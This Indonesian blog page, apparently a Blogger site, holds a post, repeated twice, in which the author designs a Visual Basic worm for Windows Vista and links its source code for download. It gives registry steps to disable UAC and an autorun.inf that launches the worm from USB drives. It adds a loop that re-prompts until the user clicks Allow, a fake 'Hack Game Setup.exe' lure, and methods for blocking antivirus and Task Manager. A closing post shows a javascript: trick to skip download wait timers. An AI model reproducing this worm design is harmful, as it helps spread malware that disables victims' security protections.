Bagaimana cara seorang User memberikan izin kepada sebuah program agar tidak difilter oleh UAC? Caranya sangat simpel. Klik kanan program tersebut, lalu akan muncul beberapa opsi. Pilih opsi RUN AS ADMINISTRATOR.
Jika User meng-klik Allow/Continue maka program dapat berjalan tanpa difilter oleh UAC. Sehingga program tersebut dapat mengubah konfigurasi sistem atau kegiatan manajemen file di folder vital (Windows dan System32). Jika User meng-klik Cancel ya artinya komputer akan membatalkan untuk menjalankan program tersebut. (P.S. : Jika User yang menjalankan ber-type standard atau guest maka untuk menjalankan program dibutuhkan password Administrator)
Nah karena UAC inilah virus-virus yang dapat berjalan di XP tidak bisa berjalan di Vista. Bagaimana jika fitur User Account Control ini tidak aktif? Benar! Virus bisa merajalela di Windows Vista!
User bisa me-nonaktifkan UAC secara manual melalui Control Panel. Tetapi untuk para expert kalian bisa melakukannya via registry. Alamatnya ada di :
HKLM\Sofware\Microsoft\Windows\CurrentVersion\Policies\System
Buat sebuah value ber-type DWORD dengan nama EnableLua dan isi value data-nya dengan nilai 0.
Restart komputer dan hupla, no more LUA (Limited User Access).
DEFAULT RUN AS ADMINISTRATOR
Seperti yang sudah dikatakan suatu program tidak bisa mengubah konfigurasi sistem seenaknya tanpa izin langsung dari User. Nah, bagaimana dengan aplikasi Installer? Aplikasi Installer adalah aplikasi yang akan menginstall sebuah program ke komputer. Misalnya installer game. Karena itu mau tidak mau aplikasi installer harus berjalan dengan modus “Run as Administrator”. Karena kalau tidak maka program tidak bisa ter-install.
Vista memberikan kemudahan kepada User dimana ada yang namanya Default Run As Administrator. Maksudnya jika User menjalankan aplikasi tersebut maka secara otomatis komputer akan menampilkan window UAC yang meminta permission kepada User. Aplikasi yang termasuk Default Run As Administrator biasanya di icon-nya akan ada gambar tameng UAC.
Bagaimana cara sebuah program dapat berjalan dengan Default Run As Administrator? Ada beberapa cara. Namun cara termudahnya adalah mengubah nama program menjadi nama yang mengandung kata INSTALL atau SETUP. Karena secara otomatis Vista akan mengeset file dengan nama yang mengandung kata INSTALL atau SETUP akan berjalan dengan Default Run As Administrator. Mudeng gak?
Untuk lebih ngertinya coba lihat gambar.
Sebelum di-rename
Kalau dibuka, maka akan langsung menuju program utama.
Setelah di-rename
Akan ada gambar tameng di icon program. Jika dibuka maka secara otomatis akan keluar window UAC.
KONSEP VIRUS VISTA
Nah dengan konsep fitur User Account Control saya merancang sebuah virus komputer yang berpotensi untuk berkembangbiak dengan lancar dan mengutak-atik konfigurasi sistem di Windows Vista tanpa difilter UAC. Bagaimana caranya?
Virus ini saya rancang dengan Visual Basic 6.0. Dan saya beri codename VB.Worm.Exterexia. Kenapa saya tulis “VB.Worm”? Iya karena malicious ware ini secara teknis adalah worm yang ditulis dengan bahasa Visual Basic. Tetapi cukup kita sebut dengan nama Virus Exterexia.
Virus ini akan menyebar ke removable disk dengan teknik Autorun. Tunggu dulu! Ya, pasti sebagian dari kalian akan berkomentar, “Teknik Autorun kan sekarang basi. Udah banyak yang tau. Lagian sekarang kebanyakan orang udah pada non-aktifin fungsi autorun di komputernya..”. Nah, karena itulah selain memakai teknik Autorun Virus ini juga akan memakai Social Engineering atau Rekayasa Sosial.
Lalu dimana bagian spesialnya? Ekhem…. Ini dia.
Teknik Autorun
Virus secara berkala mengecek semua drive yang terakses ke computer. Jika ada drive dengan type Removable (kayak Flash Disk, Disket, HD-External, dll) maka virus akan men-drop file infector ke drive tersebut. Ada 2 macam file infector yang digunakan Exterexia. Satu bernama LAUNCHER.exe dan satu lagi bernama SETUP.exe.
Lalu virus membuat autorun.inf yang isinya seperti ini :
shell\Explore\command= Launcher.exe
Shell = Explore
shellexecute = Launcher.exe
shell\Open\command= Launcher.exe
shell=Open
Jadi ketika User mengakses drive tersebut maka secara otomatis sistem akan menjalankan file Launcher.exe (jika fungsi Autorun tidak di-nonaktifkan).
Launcher.exe ini akan menampilkan pesan seperti gambar dibawah ini :
Lalu setelah mengklik OK maka Launcher.exe akan menjalankan SETUP.exe yang berjalan secara Default Run As Administrator. Sehingga otomatis akan keluar Window UAC yang meminta permission.
Jika User mengklik Cancel, window UAC akan keluar. Dan virus tidak akan berjalan. Hey! Percuma dong! Tenang, Launcher.exe akan dirancang sedemikian rupa sehingga dia akan mendeteksi bahwa SETUP.exe tidak berjalan. Sehingga Launcher.exe akan mengeksekusi kembali Setup.exe. Jika User mengklik Cancel lagi maka Setup.exe akan dieksekusi ulang oleh Launcher.exe. Begitu seterusnya hingga sang User mau mengklik Allow. Sesudah itu maka kekuasaan sudah ditangan. Setup.exe akan mematikan fitur User Account Control melalui Registry, menanamkan virus dan mengubah konfigurasi sistem lalu me-restart computer. Setelah direstart virus bisa berkembang biak dan mengacak-acak sistem dengan bebas!
P.S. : Untuk menghindari hal yang tidak diinginkan maka Launcher.exe akan me-minimize semua Window sehingga seperti benar-benar terlihat Removable Disk tidak bisa diakses. Selain itu Launcher.exe juga tidak akan berjalan apabila Exterexia sudah aktif di computer.
Social Engineering
Ini dia teknik cadangan apabila fungsi Autorun di-nonaktifin di komputer korban. Seperti yang dijelaskan pihak Microsoft sebelum Winows Vista dirilis, Vista hanya bisa dilimpuhkan oleh Social Engineering (walaupun tidak sepenuhnya bener). Social Engineering atau Rekayasa Sosial. Virus akan membuat file infector di setiap Removable Drive dengan nama : Hack Game Setup.exe. Diharapkan sang User akan membuka file infecor ini. Untuk menunjangnya virus juga akan membuat file txt dengan nama Readme.txt. Yang isinya adalah sebuah teks untuk menghasut user untuk membuka Hack Game. Padahal jika user membuka Hack Game Setup.exe maka yang ter-install bukanlah Hack Game tetapi sebuah virus. Dimana sebelum menanam virus, Hack Game Setup.exe akan menonaktifkan User Account Control.
Selain dapat berjalan di Vista virus ini juga akan berjalan dengan runtime library milik pribadi. Setelah file infector menanam virus file di sistem maka runtime msvbvm60.dll akan di-copy ke folder System32 dengan nama zrscnewx.dll. Nama yang tidak mencurigakan apabila berbaur dengan file-file dll(dynamic link library) lain di System32. Satu hal yang perlu diketahui tubuh virus file akan diutak-atik sedemikian rupa (dengan tool semacam HEX Editor) agar berjalan dengan runtime library zrscnewx.dll (Untuk lebih jelasnya coba lihat artikel Tutorial : GEBRAKAN BARU VB TANPA MSVBVM60.DLL atau Tutorial Jasakom). Sementara file infector sendiri tetap berjalan dengan menggunakan runtime library msvbvm60.dll. Karena gak lucu apabila file infector dibuat agar menggunakan runtime library selain msvbvm60.dll misalnya tukul.dll. Gimana bisa jalan kalau tukul.dll sendiri tidak ada di komputer korban?
Ok..ok.. mungkin diantara kalian masih ada yang gak ngerti dengan penjelasan dari saya. Ni deh… saya kasih gambar biar lebih jelas.
APA YANG AKAN DILAKUKAN EXTEREXIA?
Kegiatan yang rutin dilakukan oleh virus Exterexia :
1. Menonaktifkan UAC (Ya iyalah) apabila virus mendeteksi User mengaktifkan kembali UAC.
2. Menyembunyikan menu Control Panel.
3. Memblokir Task Manager.
4. Disable Klik kanan dan menukar fungsi mouse (klik kanan – klik kiri).
5. Apabila virus mendeteksi User membuka sebuah window dengan caption yang mengandung kata “Reg” dan “System Configuration” maka secara otomatis virus mengeluarkan pesan dan me-restart computer.
6. Virus juga akan menutup semua window yang mempunyai caption yang mengandung kata AV, PROC, PROS, KILL, TERMINATE, X-RAY, HIJACK, SECURITY, VIR, DETECT, REMOVAL, REMOVER, CLEAN, CAPTION, UPX, COMPIL, COMPRES, SYSINTER, HEX, PACKE, ANTI, AUTORUN, dan TOOL-KIT.
7. Membuat file txt di drive C
8. Memanipulasi registry section Image File Execution Option. Dimana virus akan mengeset jika aplikasi-aplikasi dengan nama : Notepad.exe, Wordpad.exe, CMD.exe, Calc.exe, dan Solitaire.exe tidak bisa dibuka.
9. Jika virus mendeteksi ada aplikasi yang berjalan dengan nama Wmplayer.exe (Windows Media Player) maka virus akan mengeluarkan pesan khusus.
10. Manipulasi registry yang dilakukan Exterexia dilakukan secara real-time sehingga akan mempersulit User dalam melakukan pembersihan.
11. Memakai teknik Watcher Method, dimana virus akan memakai 4 file proses. Antara satu proses dengan yang lain saling mengawasi. Jika salah satu di-terminate maka yang lain akan mengekseskusi kembali.
SOURCE CODE VIRUS
Ok, saatnya pelajari kode virus. Tetapi sebelumnya saya ingin mengingatkan,
“SEMUA INI HANYALAH UNTUK PEMBELAJARAN. TIDAK ADA MAKSUD UNTUK MENYEBARKAN INFORMASI YANG MENGHASUT USER UNTUK MEMBUAT VIRUS KOMPUTER. SEMUA TINDAKAN PENYALAHGUNAAN DARI ILMU YANG DIDAPAT DARI ARTIKEL ATAU SOURCE CODE VIRUS INI DILUAR TANGGUNG JAWAB SAYA.”
Download Source Code :
http://www.divshare.com/download/3061874-19e
Bagi yang punya Windows Vista, coba deh. Jalan gak?
Satu catatan, setelah virus menginfeksi sistem maka otomatis virus-virus lain juga dapat ikut menyerang komputer karena UAC di-disable oleh virus. Sungguh merugikan. Oleh karena itu walaupun OS kalian adalah Windows Vista tetap saja kalian direkomendasikan untuk memasang Antivirus tambahan (selain Windows Defender yang sudah di-paket-kan)
ARTIKEL/VIRUS SELANJUTNYA?
Mungkin teknik yang dipaparkan disini masih kacangan. Karena masih menggunakan Social Engineering dan Autorun. Dan juga tidak bisa Run as Administrator secara otomatis. Nah, kira-kira bagaimana caranya agar virus bisa Run as Administrator tanpa memerlukan “bantuan” User (Mengklik Allow)? Karena bisa saja ada User yang mengetahui kalau sebenarnya yang meminta permission adalah virus. Nah, oleh karena itu saya sedang merancang teknik “Auto Un-LUA”.
Apa itu Auto Un-LUA? Auto Un-LUA adalah teknik dimana virus yang kita buat bisa berjalan tanpa User mengklik Allow dalam Window User Account Control (Tentunya jika program berjalan dalam User Account yang berkedudukan sebagai Administrator). Bagaimana caranya? Yaitu dengan metode SendKey dimana virus akan memasukkan Input Enter ketika Window User Account Control muncul. Maka secara otomatis opsi Allow akan terpilih tanpa diklik User.
Teknik ini akan dipakai dalam virus Exterexia.B yang akan diparakan dalam artikel selanjutnya. Tapi sabar yah karena virus-nya belum selesai.
Konsep ini sebenarnya sangat sederhana. Saya yakin banyak yang mengetahui konsep ini namun tidak sadar mereka telah mengetahuinya. Memang apa sih konsepnya?
Pada dasarnya virus yang bisa berjalan di XP sebenarnya juga dapat berjalan di Vista. Lho kok? Iya, struktur sistem di Vista sebenarnya mirip dengan XP. Hanya saja di OS Windows Vista ditambahkan komponen yang tidak terdapat di XP. Komponen tambahannya cenderung yang mencondong ke arah keamanan. Salah satu yang paling menonjol adalah adanya fitur User Account Control.
USER ACCOUNT CONTROL?
Saya yakin kalian sudah tidak asing lagi mendengar fitur ini. User Account Control atau yang sering disingkat UAC adalah fitur keamanan andalan Vista. UAC akan membatasi hak akses User dalam menjalankan sebuah program. Bahkan account yang berkedudukan sebagai administrator sendiri juga akan diberlakukan Limited User Acces (LUA) yang dikontrol dengan UAC.
Sebuah program yang berjalan di Windows Vista tidak bisa mengubah konfigurasi sistem seenaknya tanpa izin dari User. Bahkan membuat folder, me-rename file dan memindahkan file di folder Program Files dan folder Windows saja tidak bisa dilakukan oleh sebuah program apabila tidak mendapat izin langsung dari User. Hal ini dikarenakan program-program tersebut akan difilter oleh UAC.
Bagaimana cara seorang User memberikan izin kepada sebuah program agar tidak difilter oleh UAC? Caranya sangat simpel. Klik kanan program tersebut, lalu akan muncul beberapa opsi. Pilih opsi RUN AS ADMINISTRATOR.
Jika User meng-klik Allow/Continue maka program dapat berjalan tanpa difilter oleh UAC. Sehingga program tersebut dapat mengubah konfigurasi sistem atau kegiatan manajemen file di folder vital (Windows dan System32). Jika User meng-klik Cancel ya artinya komputer akan membatalkan untuk menjalankan program tersebut. (P.S. : Jika User yang menjalankan ber-type standard atau guest maka untuk menjalankan program dibutuhkan password Administrator)
Nah karena UAC inilah virus-virus yang dapat berjalan di XP tidak bisa berjalan di Vista. Bagaimana jika fitur User Account Control ini tidak aktif? Benar! Virus bisa merajalela di Windows Vista!
User bisa me-nonaktifkan UAC secara manual melalui Control Panel. Tetapi untuk para expert kalian bisa melakukannya via registry. Alamatnya ada di :
HKLM\Sofware\Microsoft\Windows\CurrentVersion\Policies\System
Buat sebuah value ber-type DWORD dengan nama EnableLua dan isi value data-nya dengan nilai 0.
Restart komputer dan hupla, no more LUA (Limited User Access).
DEFAULT RUN AS ADMINISTRATOR
Seperti yang sudah dikatakan suatu program tidak bisa mengubah konfigurasi sistem seenaknya tanpa izin langsung dari User. Nah, bagaimana dengan aplikasi Installer? Aplikasi Installer adalah aplikasi yang akan menginstall sebuah program ke komputer. Misalnya installer game. Karena itu mau tidak mau aplikasi installer harus berjalan dengan modus “Run as Administrator”. Karena kalau tidak maka program tidak bisa ter-install.
Vista memberikan kemudahan kepada User dimana ada yang namanya Default Run As Administrator. Maksudnya jika User menjalankan aplikasi tersebut maka secara otomatis komputer akan menampilkan window UAC yang meminta permission kepada User. Aplikasi yang termasuk Default Run As Administrator biasanya di icon-nya akan ada gambar tameng UAC.
Bagaimana cara sebuah program dapat berjalan dengan Default Run As Administrator? Ada beberapa cara. Namun cara termudahnya adalah mengubah nama program menjadi nama yang mengandung kata INSTALL atau SETUP. Karena secara otomatis Vista akan mengeset file dengan nama yang mengandung kata INSTALL atau SETUP akan berjalan dengan Default Run As Administrator. Mudeng gak?
Untuk lebih ngertinya coba lihat gambar.
Sebelum di-rename
Kalau dibuka, maka akan langsung menuju program utama.
Setelah di-rename
Akan ada gambar tameng di icon program. Jika dibuka maka secara otomatis akan keluar window UAC.
KONSEP VIRUS VISTA
Nah dengan konsep fitur User Account Control saya merancang sebuah virus komputer yang berpotensi untuk berkembangbiak dengan lancar dan mengutak-atik konfigurasi sistem di Windows Vista tanpa difilter UAC. Bagaimana caranya?
Virus ini saya rancang dengan Visual Basic 6.0. Dan saya beri codename VB.Worm.Exterexia. Kenapa saya tulis “VB.Worm”? Iya karena malicious ware ini secara teknis adalah worm yang ditulis dengan bahasa Visual Basic. Tetapi cukup kita sebut dengan nama Virus Exterexia.
Virus ini akan menyebar ke removable disk dengan teknik Autorun. Tunggu dulu! Ya, pasti sebagian dari kalian akan berkomentar, “Teknik Autorun kan sekarang basi. Udah banyak yang tau. Lagian sekarang kebanyakan orang udah pada non-aktifin fungsi autorun di komputernya..”. Nah, karena itulah selain memakai teknik Autorun Virus ini juga akan memakai Social Engineering atau Rekayasa Sosial.
Lalu dimana bagian spesialnya? Ekhem…. Ini dia.
Teknik Autorun
Virus secara berkala mengecek semua drive yang terakses ke computer. Jika ada drive dengan type Removable (kayak Flash Disk, Disket, HD-External, dll) maka virus akan men-drop file infector ke drive tersebut. Ada 2 macam file infector yang digunakan Exterexia. Satu bernama LAUNCHER.exe dan satu lagi bernama SETUP.exe.
Lalu virus membuat autorun.inf yang isinya seperti ini :
shell\Explore\command= Launcher.exe
Shell = Explore
shellexecute = Launcher.exe
shell\Open\command= Launcher.exe
shell=Open
Jadi ketika User mengakses drive tersebut maka secara otomatis sistem akan menjalankan file Launcher.exe (jika fungsi Autorun tidak di-nonaktifkan).
Launcher.exe ini akan menampilkan pesan seperti gambar dibawah ini :
Lalu setelah mengklik OK maka Launcher.exe akan menjalankan SETUP.exe yang berjalan secara Default Run As Administrator. Sehingga otomatis akan keluar Window UAC yang meminta permission.
Jika User mengklik Cancel, window UAC akan keluar. Dan virus tidak akan berjalan. Hey! Percuma dong! Tenang, Launcher.exe akan dirancang sedemikian rupa sehingga dia akan mendeteksi bahwa SETUP.exe tidak berjalan. Sehingga Launcher.exe akan mengeksekusi kembali Setup.exe. Jika User mengklik Cancel lagi maka Setup.exe akan dieksekusi ulang oleh Launcher.exe. Begitu seterusnya hingga sang User mau mengklik Allow. Sesudah itu maka kekuasaan sudah ditangan. Setup.exe akan mematikan fitur User Account Control melalui Registry, menanamkan virus dan mengubah konfigurasi sistem lalu me-restart computer. Setelah direstart virus bisa berkembang biak dan mengacak-acak sistem dengan bebas!
P.S. : Untuk menghindari hal yang tidak diinginkan maka Launcher.exe akan me-minimize semua Window sehingga seperti benar-benar terlihat Removable Disk tidak bisa diakses. Selain itu Launcher.exe juga tidak akan berjalan apabila Exterexia sudah aktif di computer.
Social Engineering
Ini dia teknik cadangan apabila fungsi Autorun di-nonaktifin di komputer korban. Seperti yang dijelaskan pihak Microsoft sebelum Winows Vista dirilis, Vista hanya bisa dilimpuhkan oleh Social Engineering (walaupun tidak sepenuhnya bener). Social Engineering atau Rekayasa Sosial. Virus akan membuat file infector di setiap Removable Drive dengan nama : Hack Game Setup.exe. Diharapkan sang User akan membuka file infecor ini. Untuk menunjangnya virus juga akan membuat file txt dengan nama Readme.txt. Yang isinya adalah sebuah teks untuk menghasut user untuk membuka Hack Game. Padahal jika user membuka Hack Game Setup.exe maka yang ter-install bukanlah Hack Game tetapi sebuah virus. Dimana sebelum menanam virus, Hack Game Setup.exe akan menonaktifkan User Account Control.
Selain dapat berjalan di Vista virus ini juga akan berjalan dengan runtime library milik pribadi. Setelah file infector menanam virus file di sistem maka runtime msvbvm60.dll akan di-copy ke folder System32 dengan nama zrscnewx.dll. Nama yang tidak mencurigakan apabila berbaur dengan file-file dll(dynamic link library) lain di System32. Satu hal yang perlu diketahui tubuh virus file akan diutak-atik sedemikian rupa (dengan tool semacam HEX Editor) agar berjalan dengan runtime library zrscnewx.dll (Untuk lebih jelasnya coba lihat artikel Tutorial : GEBRAKAN BARU VB TANPA MSVBVM60.DLL atau Tutorial Jasakom). Sementara file infector sendiri tetap berjalan dengan menggunakan runtime library msvbvm60.dll. Karena gak lucu apabila file infector dibuat agar menggunakan runtime library selain msvbvm60.dll misalnya tukul.dll. Gimana bisa jalan kalau tukul.dll sendiri tidak ada di komputer korban?
Ok..ok.. mungkin diantara kalian masih ada yang gak ngerti dengan penjelasan dari saya. Ni deh… saya kasih gambar biar lebih jelas.
APA YANG AKAN DILAKUKAN EXTEREXIA?
Kegiatan yang rutin dilakukan oleh virus Exterexia :
1. Menonaktifkan UAC (Ya iyalah) apabila virus mendeteksi User mengaktifkan kembali UAC.
2. Menyembunyikan menu Control Panel.
3. Memblokir Task Manager.
4. Disable Klik kanan dan menukar fungsi mouse (klik kanan – klik kiri).
5. Apabila virus mendeteksi User membuka sebuah window dengan caption yang mengandung kata “Reg” dan “System Configuration” maka secara otomatis virus mengeluarkan pesan dan me-restart computer.
6. Virus juga akan menutup semua window yang mempunyai caption yang mengandung kata AV, PROC, PROS, KILL, TERMINATE, X-RAY, HIJACK, SECURITY, VIR, DETECT, REMOVAL, REMOVER, CLEAN, CAPTION, UPX, COMPIL, COMPRES, SYSINTER, HEX, PACKE, ANTI, AUTORUN, dan TOOL-KIT.
7. Membuat file txt di drive C
8. Memanipulasi registry section Image File Execution Option. Dimana virus akan mengeset jika aplikasi-aplikasi dengan nama : Notepad.exe, Wordpad.exe, CMD.exe, Calc.exe, dan Solitaire.exe tidak bisa dibuka.
9. Jika virus mendeteksi ada aplikasi yang berjalan dengan nama Wmplayer.exe (Windows Media Player) maka virus akan mengeluarkan pesan khusus.
10. Manipulasi registry yang dilakukan Exterexia dilakukan secara real-time sehingga akan mempersulit User dalam melakukan pembersihan.
11. Memakai teknik Watcher Method, dimana virus akan memakai 4 file proses. Antara satu proses dengan yang lain saling mengawasi. Jika salah satu di-terminate maka yang lain akan mengekseskusi kembali.
SOURCE CODE VIRUS
Ok, saatnya pelajari kode virus. Tetapi sebelumnya saya ingin mengingatkan,
“SEMUA INI HANYALAH UNTUK PEMBELAJARAN. TIDAK ADA MAKSUD UNTUK MENYEBARKAN INFORMASI YANG MENGHASUT USER UNTUK MEMBUAT VIRUS KOMPUTER. SEMUA TINDAKAN PENYALAHGUNAAN DARI ILMU YANG DIDAPAT DARI ARTIKEL ATAU SOURCE CODE VIRUS INI DILUAR TANGGUNG JAWAB SAYA.”
Download Source Code :
http://www.divshare.com/download/3061874-19e
Bagi yang punya Windows Vista, coba deh. Jalan gak?
Satu catatan, setelah virus menginfeksi sistem maka otomatis virus-virus lain juga dapat ikut menyerang komputer karena UAC di-disable oleh virus. Sungguh merugikan. Oleh karena itu walaupun OS kalian adalah Windows Vista tetap saja kalian direkomendasikan untuk memasang Antivirus tambahan (selain Windows Defender yang sudah di-paket-kan)
ARTIKEL/VIRUS SELANJUTNYA?
Mungkin teknik yang dipaparkan disini masih kacangan. Karena masih menggunakan Social Engineering dan Autorun. Dan juga tidak bisa Run as Administrator secara otomatis. Nah, kira-kira bagaimana caranya agar virus bisa Run as Administrator tanpa memerlukan “bantuan” User (Mengklik Allow)? Karena bisa saja ada User yang mengetahui kalau sebenarnya yang meminta permission adalah virus. Nah, oleh karena itu saya sedang merancang teknik “Auto Un-LUA”.
Apa itu Auto Un-LUA? Auto Un-LUA adalah teknik dimana virus yang kita buat bisa berjalan tanpa User mengklik Allow dalam Window User Account Control (Tentunya jika program berjalan dalam User Account yang berkedudukan sebagai Administrator). Bagaimana caranya? Yaitu dengan metode SendKey dimana virus akan memasukkan Input Enter ketika Window User Account Control muncul. Maka secara otomatis opsi Allow akan terpilih tanpa diklik User.
Teknik ini akan dipakai dalam virus Exterexia.B yang akan diparakan dalam artikel selanjutnya. Tapi sabar yah karena virus-nya belum selesai.
hack waktu download rapidshare
Sebagian besar dari anda menggunakan 4shared untuk virtual drive anda bukan? Tetapi yang paling menyebalkan adalah ketika anda mau mengunduh (download/donlot) file anda harus menunggu beberapa detik sebelum tombol "Download" muncul. Sama seperti di RapidShare.
Bukankah itu menyebalkan? Sebenarnya kita tidak perlu menunggu selama itu. Dengan sedikit akal-akalan, anda dapat menghack "Download Time Waiting" atau waktu tunggu download. Caranya? MUDAH SEKALAIAIAAIAIAI!!!!
1) Buka halaman download file RapidShare atau 4shared
2) Klik tombol "Free User" (RapidShare) atau "Download" (4Shared)
3) Saat waktu tunggu sedang berjalan, ketikkan kode berikut ini pada Address Bar Browser anda:
Quote:
java script:var c=0
atau
Quote:
java script:alert(c=0)
PERHATIAN!!!
KATA "java" dengan "script"nya mohon digabung!!!!
4) Lalu tombol Download (RapidShare) atau Download Link (4Shared) akan muncul. Klik tombol/link tersebut dan happy downloading!!!!
Note:
Untuk 4Shared, kelihatannya anda tidak memerlukan teknik ini karena 4Shared waktu tunggunya cukup cepat. Bahkan saat saya selesai mengetikkan kode diatas, link downloadnya sudah muncul. Tetapi ini wajar di RapidShare karena waktu tunggunya cukup lama
Subscribe to:
Posts (Atom)
